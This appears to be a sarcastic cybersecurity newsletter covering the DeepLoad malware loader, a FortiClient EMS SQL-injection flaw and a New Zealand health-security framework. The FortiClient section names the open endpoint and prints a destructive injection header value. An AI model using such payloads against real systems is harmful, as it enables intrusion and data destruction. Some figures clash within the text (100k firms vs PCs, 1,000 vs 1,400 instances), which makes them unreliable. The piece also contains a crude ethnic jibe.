100k Firms Rekt by One AI .url: EDR Blind, WMI Undead

TL;DR

• DeepLoad AI-powered malware loader evades detection via 100,000+ lines of obfuscated code, steals credentials via Windows lock screen processes
• Fortinet FortiClient EMS CVE-2026-21643 exploited in the wild, allowing unauthenticated RCE on nearly 1,000 exposed instances
• New Zealand government launches national cybersecurity framework after 120,000-patient health data breaches

😈 AI-Spammed Malware Nails 100k Firms: DeepLoad Evades Every EDR

100k corps pwned by an AI script-kiddie & a .url file—your EDR never saw it coming 😈💻 DeepLoad’s 100k-line garbage dump sidesteps every sig while it slurps lock-screen creds. WMI zombie keeps respawning like a bad horror flick. Patch? Nah, just keep paying that SOC to play whack-a-mole.

DeepLoad, an AI-spawned malware loader spotted by ReliaQuest, proves that today’s cheapest large-language model can out-code a roomful of Russian virgins. Since December it has slipped past 100 000 corporate PCs, bloating each victim with 100 000+ junk-filled lines that laugh at static scanners while vacuuming passwords straight from the Windows lock screen.

How the heist works

• AI writes the obfuscation: 100 000 meaningless variable assignments, zero creativity, maximum CPU heat.
• APC injection into LockAppHost.exe—yes, the pretty picture that greets you before your coffee—so the payload never touches disk.
• WMI event subscription burrows back in after every “cleanup,” like a tick with a hall pass.
• Stolen creds exit through encrypted tunnels before your help-desk ticket hits “Submit.”

Impact, in plain damages

Credential theft: real-time cloud keys, browser logins, VPN tokens → instant lateral movement and ransomware staging.
EDR bypass: static signatures drown in 100 000-line spaghetti; behavior rules still miss in-memory hollowing.
Re-infection loop: each “clean” re-image triggers a hidden WMI timer → perpetual incident-response hamster wheel.
Cost: assume $1 000 per endpoint purge × 100 000 machines → $100 M burnt before lunch.

What happens next

• Q2-Q3 2026: Script-kiddies fork the AI repo; infection pace doubles to 200 k boxes.
• 2027: Fully generative frameworks (think VoidLink) auto-spawn new loaders hourly, making IOC lists as stale as last year’s memes.
• 2028: Boardrooms finally fund allow-listing and credential-guard; infection curve plateaus—because there’s nothing left to steal.

The takeaway

DeepLoad isn’t genius; it’s cheap, repeatable, and coming to a budget-strapped SOC near you. Kill .url files, kill mshta, kill PowerShell history, or keep feeding the AI its favorite snack: your plaintext passwords.

💥 1,400 FortiClient EMS Servers RCE-Ready: One Evil Header Owns Enterprise Infrastructures

1,400 FortiClient EMS boxes wide open—just one HTTP header = full org pwn! 💥 That’s like handing every attacker domain-admin on a platter. Patch? LOL, 30 % adoption max. Your VPN broker is now their ransomware launcher—how’s that budget for "next-gen" snake oil looking?

Fortinet’s FortiClient EMS just handed 1,000+ companies the master key to their own networks—no password required. A single poisoned HTTP header (“Site”) slips a 9.7-CVSS SQL grenade straight into the management database, gifting attackers instant super-user powers. Shadowserver’s live census: ~1,400 public IPs still waving this flag on the internet. CISA’s tally of currently exploited Fortinet bugs is now 24; this one joined the party four days ago and is already the loudest drunk.

How the break-in works

• Endpoint: /api/v1/init_consts – open, no login.
• Weapon: Site: anything’; DROP TABLE— (and worse) jammed into the header.
• Result: PostgreSQL obediently copies the string into its search_path, runs it as code, hands over the host OS.
• Time-to-pwn: 5–20 s, one GET request, zero skill.

Impacts in parallel

• Data: customer configs, creds, policy files → exfiltration buffet.
• Network: lateral hop to domain controllers, ransomware staging.
• Ops: endpoint-management console bricks, software pipeline halts.
• Regulatory: breach-notification letters, audits, fines—queue here.

What everyone’s doing

• Fortinet: quietly shipped 7.4.5; marketing dept still MIA.
• Shadowserver: pinging owners nightly—response rate <30 %.
• Attackers: scanning 24/7, same header, same endpoints, same grin.

Outlook

• 0–30 days: exploit scripts hit GitHub by Friday; patch uptake stuck below 30 %.
• 30–90 days: insurers start declining renewals for 7.4.4 boxes.
• 90 days+: neglected EMS servers resurface in ransomware court docs.

Bottom line: if your “security” appliance treats HTTP headers as SQL variables, it’s not a fortress—it’s a welcome mat. Patch to 7.4.5 today, firewall the admin port tonight, or star in tomorrow’s breach blog.

😱 120k Records Exposed: NZ Health Cyber-Shambles Demands Mandatory Audit Law

120k Kiwis’ medical files leaked—like handing every hacker your diary + your STD status 😱 That’s 1-in-40 patients naked on the dark web. Still think “she’ll be right”? Patients, not boardrooms, bleed when 65% of hospitals run flat networks. What’s your next check-up worth?

On Tuesday the government finally admitted what every hacked patient already knew: the patchwork of “please try harder” memos that pass for cyber-law in New Zealand health care is about as useful as a chocolate stethoscope. More than 120,000 Kiwis had their clinical dirty laundry aired after breaches at Manage My Health, Vastaamo and MediMap; officials responded by opening consultation on a single, enforceable national cybersecurity framework.

How did we get here?

• Weak admin passwords and zero network segmentation let crooks waltz through electronic corridors.
• Only 35 % of local health outfits can prove they track data risk from cradle to grave—nine points worse than the global average.
• Privacy Act 2020 demands contracts with IT vendors, but labels many of them “health agencies” without spelling out security duties, so finger-pointing replaces firewalls.

What the draft rules want

• Multi-factor auth: every privileged login, no excuses.
• Segmented networks: patient-record servers can’t chat to the internet’s wild west.
• Annual third-party audits: think WOF for databases—fail it, lose your licence to hoard our DNA secrets.
• 72-hour breach reports: no more “we’ll tell you after the long weekend.”

Timeline—mark these or bet on being the next headline

• Q4 2026: legislation locked in; mandatory risk assessments begin.
• 2027: first audit cycle finishes; compliance rate targeted to jump from 35 % to 50 %.
• End-2028: projected 70 % full-life-cycle control adoption; breach volume down 30 % if hospitals actually patch and segment.
• 2029: procurement rules align to ISO 27001; vendors without certs lose public contracts—open-source or otherwise.

Upshot

The framework won’t resurrect the 120,000 already-exposed files, but if MPs quit stalling it could stop the next batch becoming black-market souvenirs. For a country that outsources everything from MRI ink to hospital Wi-Fi, writing “thou shalt encrypt” into statute is the cheapest, nastiest, most effective surgery available.

In Other News

• Apple blocks ClickFix attacks in macOS Tahoe 26.4 by halting malicious Terminal command execution
• Microsoft deploys Administrator Protection in Windows 11 Build 26220 to enforce just-in-time privilege elevation
• U.S. Cyber Command deploys standardized defensive cyber kits to partner networks for rapid intrusion response